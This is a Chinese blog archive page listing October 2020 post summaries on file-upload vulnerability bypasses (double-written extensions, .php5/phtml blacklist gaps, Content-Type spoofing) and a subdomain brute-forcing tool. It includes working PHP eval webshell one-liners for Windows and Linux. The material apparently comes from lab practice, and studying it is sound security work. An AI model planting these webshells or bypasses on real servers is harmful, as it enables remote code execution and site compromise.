2020 年 10月随笔档案 - iZero

文件上传漏洞之过滤敏感文件扩展名

摘要：双写绕过：把filename.php修改为filename.pphphp 过滤掉php后就会变成filename.php

629

0

文件上传漏洞之黑名单验证

摘要：pass-03 只禁止了部分扩展名，还有.php5等扩展名可以解析为PHP。上传.php5即可。类似的扩展名有：php2，php3、php4、php5、phtml、等

541

0

文件上传漏洞之MIME类型过滤

摘要：上传的时候修改Content-Type为image/jpeg等程序指定的类型即可。修改为：使用蚁剑连接测试

640

0

命令执行写马的正确方式

摘要：Windows 错误写马正确姿势 echo ^<?php @eval($_POST[cmd]);?^> > ./iii.txt Linux 正确写马方式 echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php

1569

0

1

无状态子域名爆破工具：ksubdomain

摘要：概述开源地址：https://github.com/knownsec/ksubdomain 二进制文件下载：https://github.com/knownsec/ksubdomain/releases 在linux下，还需要安装libpcap-dev,在Windows下需要安装WinPcap，m

1667

0

iZero

10 2020 档案

公告

常用链接

我的标签

积分与排名

随笔分类

随笔档案

阅读排行榜